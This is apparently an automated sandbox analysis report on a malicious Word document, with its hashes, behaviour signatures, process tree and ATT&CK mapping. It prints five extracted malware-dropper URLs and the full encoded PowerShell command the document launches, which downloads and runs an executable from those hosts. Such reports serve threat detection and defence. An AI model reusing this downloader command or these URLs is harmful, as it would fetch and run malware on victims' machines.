Overview

overview

10

Static

static

8

49ce522ee8...b8.doc

windows7_x64

10

49ce522ee8...b8.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    134s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 23:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8.doc

  • Size

    186KB

  • MD5

    9315ac7bb0fe11fc03a239ff8fd5059c

  • SHA1

    5bc51f211db6b6fb4cafd75567edfead8569b620

  • SHA256

    49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8

  • SHA512

    149b32cf1f6b490ce083dfb66ad97f4a34c84522ad869cbaf9c8ca959c530bf4c2734c9a90cbbd11ed34064df015140d6985e6acc512f23c459ab8ac7d03cd69

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://vedax.store/cgi-bin/k21-9cbk34xfyh-83/
exe.dropper

https://revenuehotelconsultant.com/wp-includes/wwgmZV/
exe.dropper

https://ruby9mobile.com/icdx/yUAkhVvqx/
exe.dropper

http://psychologische-katzenberatung.de/wp-includes/aJxjHVH/
exe.dropper

http://www.kriti24.com/wp-content/GSMPonYO/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAG0AdABlAHAAZgB6AHcAbwA9ACcASQBjAGgAawBuAHEAegBzACcAOwAkAEMAeQBhAHkAYQBrAHUAaABrAHEAcQBhACAAPQAgACcAMgA3ACcAOwAkAEwAaQBzAG4AeABrAHYAZwB1AHMAegBtAGgAPQAnAEsAaABkAHQAZwBqAGEAdgAnADsAJABSAHMAZgB3AGwAdABvAHMAeQBpAHYAbwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDAHkAYQB5AGEAawB1AGgAawBxAHEAYQArACcALgBlAHgAZQAnADsAJABOAHgAeAB6AHEAaQBvAGsAcwA9ACcATABiAGkAcABiAGkAZgBrAGkAcAAnADsAJABMAGYAawBsAHYAeABmAHoAYgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAFQALgB3AGUAQgBDAGwASQBlAE4AdAA7ACQATQBkAGkAZQBtAHkAYgB4AG4AeABzAGMAbAA9ACcAaAB0AHQAcAA6AC8ALwB2AGUAZABhAHgALgBzAHQAbwByAGUALwBjAGcAaQAtAGIAaQBuAC8AawAyADEALQA5AGMAYgBrADMANAB4AGYAeQBoAC0AOAAzAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBlAHYAZQBuAHUAZQBoAG8AdABlAGwAYwBvAG4AcwB1AGwAdABhAG4AdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdwB3AGcAbQBaAFYALwAqAGgAdAB0AHAAcwA6AC8ALwByAHUAYgB5ADkAbQBvAGIAaQBsAGUALgBjAG8AbQAvAGkAYwBkAHgALwB5AFUAQQBrAGgAVgB2AHEAeAAvACoAaAB0AHQAcAA6AC8ALwBwAHMAeQBjAGgAbwBsAG8AZwBpAHMAYwBoAGUALQBrAGEAdAB6AGUAbgBiAGUAcgBhAHQAdQBuAGcALgBkAGUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBhAEoAeABqAEgAVgBIAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawByAGkAdABpADIANAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEcAUwBNAFAAbwBuAFkATwAvACcALgAiAHMAYABQAGwAaQBUACIAKAAnACoAJwApADsAJABMAGcAcwBwAGcAcABvAGsAbgBhAGYAPQAnAFkAZwBlAGsAbABiAHAAdQBxAHkAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwB1AGYAdABpAGYAdwBjAHQAeQB3AGwAaAAgAGkAbgAgACQATQBkAGkAZQBtAHkAYgB4AG4AeABzAGMAbAApAHsAdAByAHkAewAkAEwAZgBrAGwAdgB4AGYAegBiAC4AIgBEAG8AdwBOAGwAbwBhAGAARABgAEYAaQBgAEwARQAiACgAJABXAHUAZgB0AGkAZgB3AGMAdAB5AHcAbABoACwAIAAkAFIAcwBmAHcAbAB0AG8AcwB5AGkAdgBvAHcAKQA7ACQARQBhAHUAawBqAHMAbgBpAGwAPQAnAFQAaAB2AGUAcQB4AGwAdwB5AGIAYwBjAGIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABSAHMAZgB3AGwAdABvAHMAeQBpAHYAbwB3ACkALgAiAGwARQBuAGcAYABUAGgAIgAgAC0AZwBlACAAMgAwADAANwA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAFIAcwBmAHcAbAB0AG8AcwB5AGkAdgBvAHcAKQA7ACQASwB0AHUAaQBtAHQAYwBrAG4AcABjAD0AJwBXAGYAbQBuAGYAcgBlAGcAbABkACcAOwBiAHIAZQBhAGsAOwAkAEkAeABkAGMAeQB0AGsAbgBmAGQAPQAnAEsAbAB6AGUAbABxAGEAdgB1AGsAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAHYAaQBzAGgAegBwAGIAdgBlAHcAPQAnAFAAdwByAGQAaABzAHEAdgBjACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2000

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2000-140-0x00007FF973420000-0x00007FF973EE1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2000-139-0x000001E4A7F40000-0x000001E4A7F62000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2192-137-0x0000000000000000-mapping.dmp
      Download
    • memory/3088-133-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-134-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-135-0x00007FF95CA30000-0x00007FF95CA40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-136-0x00007FF95CA30000-0x00007FF95CA40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-130-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-138-0x00000234252C0000-0x00000234252C4000-memory.dmp
      Filesize

      16KB

      Download
    • memory/3088-131-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-132-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-142-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-143-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-144-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3088-145-0x00007FF95F170000-0x00007FF95F180000-memory.dmp
      Filesize

      64KB

      Download